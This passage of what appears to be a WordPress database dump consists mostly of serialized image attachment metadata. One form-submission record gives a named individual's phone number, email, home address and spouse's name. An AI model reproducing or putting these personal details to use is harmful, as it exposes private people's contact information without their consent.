:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27469,198802,'_wp_attached_file','2019/10/harold-bg-tabs-C.jpg'),(27470,198802,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:167;s:6:\"height\";i:216;s:4:\"file\";s:28:\"2019/10/harold-bg-tabs-C.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"harold-bg-tabs-C-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:26:\"harold-bg-tabs-C-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:28:\"harold-bg-tabs-C-139x180.jpg\";s:5:\"width\";i:139;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:28:\"harold-bg-tabs-C-167x150.jpg\";s:5:\"width\";i:167;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27471,198803,'_wp_attached_file','2019/10/harold-bg-tabs-D.jpg'),(27472,198803,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:244;s:6:\"height\";i:216;s:4:\"file\";s:28:\"2019/10/harold-bg-tabs-D.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"harold-bg-tabs-D-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:26:\"harold-bg-tabs-D-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:28:\"harold-bg-tabs-D-203x180.jpg\";s:5:\"width\";i:203;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:28:\"harold-bg-tabs-D-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27473,198804,'_wp_attached_file','2019/10/harold-bg-tabs-E.jpg'),(27474,198804,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:258;s:6:\"height\";i:216;s:4:\"file\";s:28:\"2019/10/harold-bg-tabs-E.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"harold-bg-tabs-E-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:26:\"harold-bg-tabs-E-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:28:\"harold-bg-tabs-E-250x209.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:209;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:28:\"harold-bg-tabs-E-215x180.jpg\";s:5:\"width\";i:215;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:28:\"harold-bg-tabs-E-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27475,198805,'_wp_attached_file','2019/10/harold-bg-tabs-F.jpg'),(27476,198805,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:159;s:6:\"height\";i:216;s:4:\"file\";s:28:\"2019/10/harold-bg-tabs-F.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"harold-bg-tabs-F-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:26:\"harold-bg-tabs-F-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:28:\"harold-bg-tabs-F-133x180.jpg\";s:5:\"width\";i:133;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:28:\"harold-bg-tabs-F-159x150.jpg\";s:5:\"width\";i:159;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27477,198806,'_wp_attached_file','2019/10/harold-bg-tabs-G.jpg'),(27478,198806,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:266;s:6:\"height\";i:216;s:4:\"file\";s:28:\"2019/10/harold-bg-tabs-G.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"harold-bg-tabs-G-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:26:\"harold-bg-tabs-G-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:28:\"harold-bg-tabs-G-250x203.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:203;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:28:\"harold-bg-tabs-G-222x180.jpg\";s:5:\"width\";i:222;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:28:\"harold-bg-tabs-G-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27479,198807,'_wp_attached_file','2019/10/harold-klemp-smtabs-1.jpg'),(27480,198807,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:124;s:6:\"height\";i:161;s:4:\"file\";s:33:\"2019/10/harold-klemp-smtabs-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"harold-klemp-smtabs-1-124x150.jpg\";s:5:\"width\";i:124;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:31:\"harold-klemp-smtabs-1-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:33:\"harold-klemp-smtabs-1-124x150.jpg\";s:5:\"width\";i:124;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27531,198903,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:366;s:6:\"height\";i:206;s:4:\"file\";s:24:\"2019/10/island-heart.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"island-heart-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"island-heart-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:22:\"island-heart-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:24:\"island-heart-300x206.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:206;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:24:\"island-heart-250x141.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:141;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:24:\"island-heart-320x180.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:24:\"island-heart-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27532,198904,'_wp_attached_file','2019/10/orange-flowers.jpg'),(27533,198904,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:324;s:6:\"height\";i:206;s:4:\"file\";s:26:\"2019/10/orange-flowers.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"orange-flowers-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"orange-flowers-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:24:\"orange-flowers-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:26:\"orange-flowers-300x206.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:206;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:26:\"orange-flowers-250x159.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:159;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:26:\"orange-flowers-283x180.jpg\";s:5:\"width\";i:283;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:26:\"orange-flowers-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27534,198905,'_wp_attached_file','2019/10/poppy-field.jpg'),(27535,198905,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:366;s:6:\"height\";i:206;s:4:\"file\";s:23:\"2019/10/poppy-field.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"poppy-field-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"poppy-field-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:21:\"poppy-field-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:23:\"poppy-field-300x206.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:206;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:23:\"poppy-field-250x141.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:141;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:23:\"poppy-field-320x180.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:23:\"poppy-field-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(73645,254595,'_wp_attached_file','2020/01/woman-ocean.jpg'),(73646,254595,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:366;s:6:\"height\";i:212;s:4:\"file\";s:23:\"2020/01/woman-ocean.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"woman-ocean-300x174.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"woman-ocean-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:21:\"woman-ocean-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:23:\"woman-ocean-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:23:\"woman-ocean-250x145.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:145;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:23:\"woman-ocean-311x180.jpg\";s:5:\"width\";i:311;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:23:\"woman-ocean-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27538,198976,'_wp_attached_file','2019/10/butterfly-tulips.jpg'),(27539,198976,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:329;s:6:\"height\";i:206;s:4:\"file\";s:28:\"2019/10/butterfly-tulips.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"butterfly-tulips-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"butterfly-tulips-300x188.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:26:\"butterfly-tulips-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:28:\"butterfly-tulips-300x206.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:206;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:28:\"butterfly-tulips-250x157.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:157;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:28:\"butterfly-tulips-287x180.jpg\";s:5:\"width\";i:287;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:28:\"butterfly-tulips-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27540,198977,'_wp_attached_file','2019/10/sphere-nature-1.jpg'),(27541,198977,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:308;s:6:\"height\";i:192;s:4:\"file\";s:27:\"2019/10/sphere-nature-1.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"sphere-nature-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"sphere-nature-1-300x187.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:25:\"sphere-nature-1-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:27:\"sphere-nature-1-300x192.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:27:\"sphere-nature-1-250x156.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:156;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:27:\"sphere-nature-1-289x180.jpg\";s:5:\"width\";i:289;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:27:\"sphere-nature-1-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27542,198978,'_wp_attached_file','2019/10/white-puppies.jpg'),(27543,198978,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:342;s:6:\"height\";i:192;s:4:\"file\";s:25:\"2019/10/white-puppies.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"white-puppies-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"white-puppies-300x168.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:168;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:23:\"white-puppies-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:25:\"white-puppies-300x192.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:25:\"white-puppies-250x140.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:25:\"white-puppies-321x180.jpg\";s:5:\"width\";i:321;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:25:\"white-puppies-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27544,198979,'_wp_attached_file','2019/10/wooden-bridge.jpg'),(27545,198979,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:366;s:6:\"height\";i:206;s:4:\"file\";s:25:\"2019/10/wooden-bridge.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"wooden-bridge-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"wooden-bridge-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:23:\"wooden-bridge-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:25:\"wooden-bridge-300x206.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:206;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:25:\"wooden-bridge-250x141.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:141;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:25:\"wooden-bridge-320x180.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:25:\"wooden-bridge-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(96624,262250,'_field_30','Robert'),(96625,262250,'_field_31','Hepple'),(96626,262250,'_field_32','(360) 306-0953'),(96627,262250,'_field_33','a64me@yahoo.com'),(96628,262250,'_field_34','68 KNADLER DR'),(96629,262250,'_field_35','Bozeman'),(96630,262250,'_field_36','MT'),(96631,262250,'_field_37','US'),(96632,262250,'_field_39','Please add my spouse Christiane Leske to the newsletter mailing list as well.'),(96633,262250,'_form_id','4'),(96634,262250,'_seq_num','8'),(96635,198905,'_edit_lock','1603556420:2'),(96636,262251,'_wp_attached_file','2020/10/eck-on-vimeo-1.png'),(96637,262251,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:235;s:6:\"height\";i:147;s:4:\"file\";s:26:\"2020/10/eck-on-vimeo-1.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"eck-on-vimeo-1-150x147.png\";s:5:\"width\";i:150;s:6:\"height\";i:147;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(128872,263459,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1611754998;s:12:\"_EventOrigin\";i:1611754998;s:13:\"_thumbnail_id\";i:1611755387;s:24:\